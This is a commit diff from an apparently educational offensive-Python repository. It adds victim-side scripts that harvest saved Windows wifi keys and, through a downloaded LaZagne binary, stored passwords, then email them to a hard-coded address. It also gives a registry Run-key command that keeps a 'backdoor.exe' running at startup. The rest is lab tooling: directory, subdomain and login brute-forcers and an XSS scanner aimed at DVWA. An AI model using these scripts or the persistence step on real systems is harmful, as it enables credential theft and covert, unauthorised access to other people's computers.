This repository was archived by the owner on Aug 24, 2023. It is now read-only.

Commit 0f93525 ("Updated")
Author: root
1 parent: 4fa67ef

Note: this is a large commit, so some file headers and contents are hidden in this view; a few hunks below therefore appear without a file name.

48 files changed: +23363 -61 lines

10 arpspoof_detector/arpspoof_detector.py (+3)

@@ -1,4 +1,7 @@
 #!/usr/bin/python2
+#put the script in a startup folder so it runs when the system boots
+#put it in /etc/init.d/script.py and make it executable: sudo chmod 755 /etc/init.d/script.py
+#register the script to run at startup: sudo update-rc.d script.py defaults
 
 import scapy.all as scapy
 
11 execute_sys_cmd_report/report_windows_wifipassword_toemail.py renamed to 11 execute_sys_cmd_report/report_windows_wifi_password_to_email.py (+5 -2)

@@ -1,4 +1,6 @@
 #!/usr/bin/python2.7
+#copy the script to the victim machine; this script should run on the victim side (Windows host)
+#gets the saved wifi passwords and sends the gathered information to the mail address mentioned in the script
 
 import subprocess
 import smtplib

@@ -18,9 +20,10 @@ def send_mail(email,password,message):
 
 result = ""
 for network_name in network_names_list:
-    command = "netsh wlan show profile" +network_name+" key=clear"
+    command = "netsh wlan show profile %s key=clear" % network_name
+    #key=clear reveals the stored key for each and every network saved on the system
     current_result = subprocess.check_output(command,shell=True)
     result = result + current_result
 
 
-send_mail("mail@gmail.com","password",result)
+send_mail("user@mail.com","password",result)

13 recover_saved_passwd_on_target/download_lazagne_execute_report_toemail.py renamed to 13 recover_saved_passwd_on_target/report_windows_saved_password_to_email.py (+7)

@@ -1,4 +1,9 @@
 #!/usr/bin/python2.7
+#The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.
+#https://github.com/AlessandroZ/LaZagne : download the LaZagne file from here
+#it works on Windows, Linux and Mac, but this script uses lazagne.exe to recover passwords
+#copy the script to the victim machine; this script should run on the victim side (Windows host)
+
 
 import requests
 import subprocess

@@ -26,6 +31,8 @@ def send_mail(email,password,message):
 temp_directory = tempfile.gettempdir()
 os.chdir(temp_directory)
 download("http://localhost where lazagne .exe is stored")
+#host lazagne.exe on a web server and put that link here to download it, or
+#copy lazagne.exe to the victim and run this script from that path
 result = subprocess.check_output("lazagne.exe all",shell=True)
 send_mail("[email protected]","password",result)
 os.remove("lazagne.exe")

16 pyinstaller/pyinstaller.txt (+5 -10)

@@ -1,6 +1,6 @@
 pyinstaller
 
-install pyinstaller to convert and pack all python code into 1 executable for the targetted operating system
+install pyinstaller to convert and pack all python code into one executable for the target operating system
 
 pip install pyinstaller
 #for linux

@@ -29,7 +29,7 @@ subprocess.check_output(command,shell=True,stderr=subprocess.DEVNULL,stdin=subprocess.DEVNULL)
 DEVNULL = open(os.devnull,"wb")
 subprocess.check_output(command,shell=True,stderr=DEVNULL,stdin=DEVNULL)
 
-To create a Python Executable it better to do that os environment
+To create a Python executable it is better to build it in the same OS environment as your target,
 that is, to run a py executable on Windows,
 create the exe on a Windows system with the required libs and modules installed, then put the exe on the victim system to run
 
@@ -47,17 +47,12 @@ pip install in windows interpreter of linux
 
 wine ~/.wine/drive_c/Python27/python.exe -m pip install pyinstaller
 
+
+
 Maintain persistence by putting the script in startup; when the OS boots, these scripts always get loaded
 
 in the Windows Registry:
 Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 
 from the cmd prompt we can add the value:
-reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
-
-Trojans
-
-Trojans are files that look and function like a normal file, such as an image, pdf or song
-
-when the user clicks on one, the image opens in the foreground while the script runs invisibly in the background
-
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
File renamed without changes.
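A short sketch tying together the two pyinstaller.txt notes above: the Python 2 silenced-subprocess pattern and the Run-key persistence. The backdoor path and value name are placeholder assumptions:

#!/usr/bin/python2.7
import os
import subprocess

# Python 2 has no subprocess.DEVNULL, so open os.devnull by hand
DEVNULL = open(os.devnull, "wb")

# register a Run-key value so the executable starts at every logon (path is a placeholder)
command = 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' \
          ' /v name /t REG_SZ /d "C:\\Users\\Public\\backdoor.exe" /f'
subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)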

17 crawler/crawler_1.py (file mode changed 100644 → 100755)

17 crawler/crawler_2.py (file mode changed 100644 → 100755)

17 crawler/crawler_3.py (-26)

This file was deleted.

New file (+32; header hidden in this view):

@@ -0,0 +1,32 @@
+#!/usr/bin/python2.7
+#discover hidden directories by brute-forcing common directory names
+#if we get a response then the directory exists, and we then recurse into that directory.
+
+import requests
+
+def request(url):
+    try:
+        return requests.get("http://" + url)
+    except requests.exceptions.ConnectionError:
+        pass
+
+path = []
+def dirdiscover(url):
+    with open("common_dir.txt","r") as wordlist_file:
+        for line in wordlist_file:
+            word = line.strip()
+            test_url = url + "/" + word
+            response = request(test_url)
+            if response:
+                print "[+] Discovered URL ----> " + test_url
+                path.append(word)
+
+url = "192.168.44.101/mutillidae"
+#edit the url you want to scan
+dirdiscover(url)
+
+#recursively go through each and every discovered path
+for paths in path:
+    dirdiscover(url + "/" + paths)
+
+
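The script reads common_dir.txt from its working directory; the commit does not show that wordlist, but entries of the following kind are typical (illustrative only, not the repo's actual list):

admin
backup
css
images
js
uploads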

17 crawler/testing_google_subdomain/crawler_1.py renamed to 17 crawler/testing_google_subdomain/discover_subdomains_of_domain.py (+7 -5)

@@ -1,4 +1,6 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#discover subdomains of a domain by brute-forcing common subdomain names against it;
+#if we get a response then the subdomain exists
 
 import requests
 from datetime import datetime

@@ -12,20 +14,20 @@ def request(url):
         pass
 
 target_url = "google.com"
-subdomain_list = []
+#subdomain_list = []
 file = open("googlesubdomain.txt","aw")
-with open("subdomain19","r") as wordlist_file:
+with open("top_10_subdomain.txt","r") as wordlist_file:
     for line in wordlist_file:
         word = line.strip()
         test_url = word + "." + target_url
         response = request(test_url)
         if response:
             print "[+] Discovered subdomain ----> " + test_url
-            subdomain_list.append(test_url)
+            #subdomain_list.append(test_url)
             file.write(test_url + "\n")
 file.close()
 
 stop = datetime.now()
 
 totaltime = stop - start
-print "TotalTime = ", totaltime
+print "\n[***] TotalTimeTaken = ", totaltime

17 crawler/testing_google_subdomain/googlesubdomain.txt (+12)

@@ -153,3 +153,15 @@ hangout.google.com
 spaces.google.com
 gears.google.com
 answer.google.com
+sky.google.com
+surveys.google.com
+plus.google.com
+xmpp.google.com
+www.google.com
+mail.google.com
+www.google.com
+mail.google.com
+www.google.com
+mail.google.com
+www.google.com
+mail.google.com
17 crawler/testing_google_subdomain/top_10_subdomain.txt (+10; header hidden in this view, name inferred from the wordlist the script above opens)

@@ -0,0 +1,10 @@
+www
+mail
+ftp
+localhost
+webmail
+smtp
+webdisk
+pop
+cpanel
+whm

18 spider/spider_3.py renamed to 18 spider/discover_urls_in_domain.py (+5 -4)

@@ -1,4 +1,5 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#discover URLs in the domain by extracting the href links from page content and crawling recursively to get all URLs
 
 import requests
 import re

@@ -17,12 +18,12 @@ def crawl(url):
     for link in href_links:
         link = urlparse.urljoin(url,link)
 
-        if "#" in link: # #r refers to the original page, so avoid the duplicate page again and again
+        if "#" in link: # "#" refers to a place in the original page, so strip it to avoid the duplicate page again and again
            link = link.split("#")[0]
 
        if target_url in link and link not in target_links: #to avoid repeating the same url
            target_links.append(link)
-           print link
-           crawl(link) #recurrsively crawling
+           print "[+]urls --->",link
+           crawl(link) #recursively crawling
 
 crawl(target_url)
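The href_links list comes from an extract_links_from helper outside this hunk; a typical regex-based version consistent with the imports above (a sketch, not necessarily the file's exact code):

def extract_links_from(url):
    # return every href="..." value found in the raw page source
    response = requests.get(url)
    return re.findall('(?:href=")(.*?)"', response.content)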

18 spider/spider_1.py (file mode changed 100644 → 100755, +1 -1)

@@ -3,7 +3,7 @@
 import requests
 import re
 
-target_url = "http://192.168.43.1"
+target_url = "http://192.168.44.101"
 
 def extract_links_from(url):
     response = requests.get(url)

18 spider/spider_2.py (file mode changed 100644 → 100755, +1 -1)

@@ -4,7 +4,7 @@
 import re
 import urlparse
 
-target_url = "http://192.168.43.1"
+target_url = "http://192.168.44.101"
 target_links = []
 
 def extract_links_from(url):

19 bruteforce_login_form/bruteforce_login_form.py (file mode changed 100644 → 100755, +4 -1)

@@ -1,4 +1,7 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#brute-force the login form password with a list of passwords by checking the response content:
+#if the response contains "Login failed" the password is incorrect, so if it does not, the tried value is the password
+#here I used Damn Vulnerable Web App to test; you can get the Metasploitable2 VirtualBox image to run DVWA
 
 import requests
 
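The loop itself is outside this hunk; a minimal sketch of the check the new comments describe (the URL, form field names, and wordlist filename are assumptions based on a stock DVWA setup):

import requests

target_url = "http://192.168.44.101/dvwa/login.php"  # assumption
with open("passwords.txt", "r") as wordlist_file:    # assumption: one candidate per line
    for line in wordlist_file:
        password = line.strip()
        data_dict = {"username": "admin", "password": password, "Login": "submit"}
        response = requests.post(target_url, data=data_dict)
        if "Login failed" not in response.content:
            print "[+] Got the password ----> " + password
            break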

19 bruteforce_login_form/extract_forms.py (file mode changed 100644 → 100755)

New file (+16; header hidden in this view):

@@ -0,0 +1,16 @@
+#!/usr/bin/python2.7
+#fill a form with a script by passing the values in data_dict, then send that as a POST request
+#we can automate the form filling by importing data from a file and looping to submit each entry, exiting after the final one
+#the html_form.zip is provided to test this script
+#put the files in the /var/www/html/* location
+#start your own web server and test it !!
+
+import requests
+
+target_url = "http://127.0.0.1/process.php"
+data_dict = {"user":"admin","pass":"password","Login":"submit"}
+response = requests.post(target_url, data=data_dict)
+
+print response
+print response.content
+
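As the comments in this file suggest, the same POST can be driven from a data file; a small sketch of that loop (the form_data.txt name and its comma-separated layout are assumptions):

import requests

target_url = "http://127.0.0.1/process.php"
with open("form_data.txt", "r") as data_file:  # assumed format: user,pass per line
    for line in data_file:
        user, password = line.strip().split(",")
        data_dict = {"user": user, "pass": password, "Login": "submit"}
        print requests.post(target_url, data=data_dict)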

19 bruteforce_login_form/post_request.py (file mode changed 100644 → 100755, +2 -1)

@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
 
 import requests
 

@@ -8,3 +8,4 @@
 
 print response
 print response.content
+
20 vulnerability_scanner/scanner.py (file mode changed 100644 → 100755, +30 -8)

@@ -1,11 +1,16 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#find XSS vulnerabilities in forms and URLs: this works by finding the URLs and forms and trying to inject code into them
+#if the code gets injected (reflected back), the page is vulnerable to XSS
+#don't stick to this code alone; explore other XSS-vulnerability scanners online
+#this works on Damn Vulnerable Web App only
 
 import requests
 import re
 import urlparse
 from BeautifulSoup import BeautifulSoup
 
 class Scanner:
+
     def __init__(self,url,ignore_links):
         self.session = requests.Session()
         self.target_url = url

@@ -30,7 +35,7 @@ def crawl(self,url=None):
             if self.target_url in link and link not in self.target_links and link not in self.links_to_ignore:
                 #to avoid repeating the same url and to ignore the logout url
                 self.target_links.append(link)
-                print link
+                #print link
                 self.crawl(link)
 
     def extract_forms(self,url):

@@ -65,24 +70,41 @@ def run_scanner(self):
                 print "[+] Testing form in " + link
                 is_vulnerable_to_xss = self.test_xss_in_form(form,link)
                 if is_vulnerable_to_xss:
-                    print "\n\n[***] XSS discovered in "+link+" in the follwing form"
+                    print "--"*50
+                    print "[*****] XSS discovered in "+link+" in the following form:"
                     print form
-
+                    print "--"*50
 
             if "=" in link:
-                print "\n\n[+] Testing " + link
+                print "[+] Testing " + link
                 is_vulnerable_to_xss = self.test_xss_in_link(link)
                 if is_vulnerable_to_xss:
-                    print "[***] Discovered XSS in " + link
+                    print "--"*50
+                    print "[*****] Discovered XSS in " + link
+                    print link
+                    print "--"*50
 
     def test_xss_in_link(self,url):
         xss_test_script = "<sCript>alert('test')</scriPt>"
         url = url.replace("=","="+ xss_test_script)
         response = self.session.get(url)
-
         return xss_test_script in response.content
 
     def test_xss_in_form(self,form,url):
         xss_test_script = "<sCript>alert('test')</scriPt>"
         response = self.submit_form(form,xss_test_script,url)
-        return xss_test_script in response.content
+        return xss_test_script in response.content
+
+
+target_url = "http://192.168.44.101/dvwa/"
+links_to_ignore = ["http://192.168.44.101/dvwa/logout.php"]
+vuln_scanner = Scanner(target_url,links_to_ignore)
+
+#log in first so the crawler can reach more links to test
+data_dict = {"username":"admin","password":"password","Login":"submit"}
+vuln_scanner.session.post("http://192.168.44.101/dvwa/login.php",data=data_dict)
+
+#crawl through the links
+vuln_scanner.crawl()
+#run the scan on each crawled link
+vuln_scanner.run_scanner()
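run_scanner depends on extract_forms and submit_form, neither of which appears in this hunk; typical BeautifulSoup-based versions consistent with the calls above (a sketch, not the file's exact code):

    def extract_forms(self, url):
        # parse the page and return all <form> elements
        response = self.session.get(url)
        parsed_html = BeautifulSoup(response.content)
        return parsed_html.findAll("form")

    def submit_form(self, form, value, url):
        # fill every text input with the test payload and post to the form's action
        action = form.get("action")
        post_url = urlparse.urljoin(url, action)
        post_data = {}
        for input_tag in form.findAll("input"):
            input_name = input_tag.get("name")
            input_type = input_tag.get("type")
            input_value = input_tag.get("value")
            if input_type == "text":
                input_value = value
            post_data[input_name] = input_value
        return self.session.post(post_url, data=post_data)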

20 vulnerability_scanner/vulnerability_scanner.py (file mode changed 100644 → 100755)
